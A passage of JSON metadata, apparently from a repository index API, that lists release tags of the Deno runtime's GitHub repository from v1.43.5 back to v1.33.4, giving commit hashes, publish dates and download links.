eno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecos